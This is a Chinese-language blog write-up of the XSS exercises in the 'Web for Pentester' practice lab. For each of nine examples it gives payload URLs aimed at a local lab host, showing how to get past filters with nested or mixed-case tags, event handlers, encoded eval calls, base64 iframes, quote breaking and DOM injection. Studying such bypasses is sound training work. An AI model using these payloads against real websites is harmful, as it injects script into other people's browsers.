Web for pentester_writeup之XSS篇
Web for pentester_writeup之XSS篇
XSS(跨站脚本攻击)
Example 1
反射性跨站脚本,URL中name字段直接在网页中显示,修改name字段,
Payload:
http://192.168.219.136/xss/example1.php?name=<script>alert(1)</script>
Example 2
和例1相似,但是做了相关字符串正则过滤,过滤<script></script>字符串
Paload1:
http://192.168.219.136/xss/example2.php?name=<scri<script>pt>alert(1)</scri</script>pt>
Paload2:
http://192.168.219.136/xss/example2.php?name=<Script>alert(1)</sCript>
Example 3
同样是过滤,使用例2的payload2无法成功
使用例2的payload1成功绕过过滤,可知新加了一层大小写过滤,但未考虑到标签包含标签方式过滤
Payload1:
http://192.168.219.136/xss/example3.php?name=<scri<script>pt>alert(1)</scri</script>pt>
还有一种方式,就是不使用script脚本
Payload2:
http://192.168.219.136/xss/example3.php?name=<img src=x onerror=alert(1)>
Example 4
返回值变为error,测试其他payload,发现只要payload包含script字符就会报错,使用无script字符的脚本验证
Payload1:
http://192.168.219.136/xss/example4.php?name=<img src=x onerror=alert(1)>
Payload2:
http://192.168.219.136/xss/example4.php?name=<BODY ONLOAD=alert('XSS')>
成功弹窗。
Example 5
测试上述payload均报错,应该是过滤掉了alert字符,测试使用html实体编码均失败
http://192.168.219.136/xss/example5.php?name=<img src=x onerror=alert(1)>
http://192.168.219.136/xss/example5.php?name=<script>alert(1)</script>
使用eval执行编码绕过
Payload1(十进制)
http://192.168.219.136/xss/example5.php?name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
Payload2(十六进制)
http://192.168.219.136/xss/example5.php?name=<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script>
Payload3
http://192.168.219.136/xss/example5.php?name=<script>eval(\u0061\u006c\u0065\u0072\u0074(1))</script>
OR
http://192.168.219.136/xss/example5.php?name=<script>eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')</script>
Payload4((BASE64编码)将<<script>alert(1)</script>整个base64编码为:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)
http://192.168.219.136/xss/example5.php?name=<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
Payload5(prompt)
http://192.168.219.136/xss/example5.php?name=<img src=x onerror=prompt(1)>
Example 6
使用上述的payload测试均无法成功弹窗,页面返回“ "; ”
发现返回payload后面的字符串
Payload1
http://192.168.219.136/xss/example6.php?name=<scri<script>pt>alert(1)</scri</script>pjkgkhhhhhhhhhhhhhhht><script>alert(1)</script>
为了找到具体的原因,设置Payload值为<script>alert(1)</script>,查看网页源代码
发现提交的东西赋入了变量a,故构造
Payload2
http://192.168.219.136/xss/example6.php?name=</script><script>alert(1);"
Example 7
使用</script><script>alert(1);"无法弹窗,直接查看源代码
发现对<>做了转义处理,通过闭合前后的单引号“’”,成功弹窗
Payload
http://192.168.219.136/xss/example7.php?name='; alert(1);'
OR(直接注释掉后面的单引号)
http://192.168.219.136/xss/example7.php?name='; alert(1)//
Example 8
开始有输入框了,猜测是存储性跨站脚本,输入<script>alert(1)</script>
无弹窗,查看源代码
尖括号被转义,尝试各种编码都失败了,查看参考答案发现还是反射型跨站脚本,一开始思路就错了,啪啪打脸。
漏洞点在于/xss/example8.php,通过在/xss/example8.php/[XSS_PAYLOAD]注入payload可以获取弹窗
Payload
http://192.168.219.136/xss/example8.php/"><script>alert(1)</script>
Example 9
这个的意思是指取地址栏#后的语句,然后也没做什么过滤,很简单的加入标签就好了
Payload
http://192.168.219.136/xss/example9.php?<script>alert(1)</script>
注:本关卡主要理解domxss的作用,在字符串带入中可以用?和#,如果用?需要和服务器交互,但是如果用#,则可以抓包看到实际上请求的xss脚本并未提交到服务器,这里可以更好的理解domxss,实际上不需要服务器的解析,实际上是利用浏览器的dom解析就可以完成,这是domxss与其他xss最本质的区别
注意(这里有点坑) :
用的ie浏览器可以实验成功
火狐和谷歌浏览器都会对<转码:%3Cscript%3Ealert(1)%3C/script%3E
Web for pentester_writeup之XSS篇的更多相关文章
- Web for pentester_writeup之XML attacks篇
Web for pentester_writeup之XML attacks篇 XML attacks(XML攻击) Example 1 - XML外部实体注入(XXE) Payload http:// ...
- Web for pentester_writeup之LDAP attacks篇
Web for pentester_writeup之LDAP attacks篇 LDAP attacks(LDAP 攻击) LDAP是轻量目录访问协议,英文全称是Lightweight Directo ...
- Web for pentester_writeup之File Upload篇
Web for pentester_writeup之File Upload篇 File Upload(文件上传) Example 1 直接上传一句话木马,使用蚁剑连接 成功连接,获取网站根目录 Exa ...
- Web for pentester_writeup之Commands injection篇
Web for pentester_writeup之Commands injection篇 Commands injection(命令行注入) 代码注入和命令行注入有什么区别呢,代码注入涉及比较广泛, ...
- Web for pentester_writeup之Code injection篇
Web for pentester_writeup之Code injection篇 Code injection(代码注入) Example 1 <1> name=hacker' 添加一个 ...
- Web for pentester_writeup之File Include篇
Web for pentester_writeup之File Include篇 File Include(文件包涵) Example 1 加一个单引号 从报错中我们可以获取如下信息: 当前文件执行的代 ...
- Web for pentester_writeup之Directory traversal篇
Web for pentester_writeup之Directory traversal篇 Directory traversal(目录遍历) 目录遍历漏洞,这部分有三个例子,直接查看源代码 Exa ...
- Web for pentester_writeup之SQL injections篇
Web for pentester_writeup之SQL injections篇 SQL injections(SQL注入) Example 1 测试参数,添加 and '1'='1, 'and ' ...
- Web For Pentester 学习笔记 - XSS篇
XSS学习还是比较抽象,主要最近授权测的某基金里OA的XSS真的实在是太多了,感觉都可以做一个大合集了,加上最近看到大佬的博客,所以这里我也写一个简单的小靶场手册,顺带着也帮助自己把所有XSS的方式给 ...
随机推荐
- 夯实Java基础系列12:深入理解Java中的反射机制
本系列文章将整理到我在GitHub上的<Java面试指南>仓库,更多精彩内容请到我的仓库里查看 https://github.com/h2pl/Java-Tutorial 喜欢的话麻烦点下 ...
- touch,stat
touch(选项)(参数) 一是可以用来创建空文件,二是用来改变文件的元属性-a:修改文件的访问时间为当前时间-m:修改文件的改变时间为当前时间-r:把文件的属性修改成和某些文件一样的时间-t:修改成 ...
- Redis系列---操作命令及数据类型
本章将简单介绍下,Redis里面常用的数据类型以及我们常用到的一些命令,let's go 准备环境: Redis 详细见上一个章节 我们接下来操作的命令用的是Redis自带的客户端工具,在安装red ...
- 检测MySQL主从是否异常
#!bin/bash user='root' passwd="123" host="192.168.192.156" mycmd="mysql -u$ ...
- Java性能调优的9个实用方法
1.使用StringBuilder StingBuilder 应该是在我们的Java代码中默认使用的,应该避免使用 + 操作符. 一般来说,使用 StringBuilder 的效果要优于使用 + 操作 ...
- IDEA 学习笔记之 Console显示日志大小
Console显示日志大小: IntelliJ IDEA默认的Output输出缓存区大小只有1024KB,超过大小限制的就会被清除,而且还会显示[too much output to process] ...
- Activity初学乍练
1.Activity的概念与Activity的生命周期图: 注意事项: onPause()和onStop()被调用的前提是: 打开了一个新的Activity!而前者是旧Activity还可见的状态:后 ...
- MOV与LEA
MOV 格式:MOV dest, src 作用:赋值,且不改变标记位的值 特点:可以从寄存器到寄存器.从立即数到寄存器.从存储单元到寄存器.从立即数到储存单元.从寄存器到存储单元.从寄存器或存储单元到 ...
- 浅谈celery的坑
celery celery的使用以及在Django中的配置,不详细介绍,主要记录在Django中使用的坑点. 坑点 时区问题 celery默认的时区是世界标准时间,比东八区慢了8个小时,如果发布定时任 ...
- go-defer语句
Go语言中的defer语句也非常独特. defer语句仅能被放置在函数或方法中. 它由关键字defer和一个调用表达式组成. 调用表达式所表示的既不能是对Go语言内建函数的调用 也不能是对Go语言标准 ...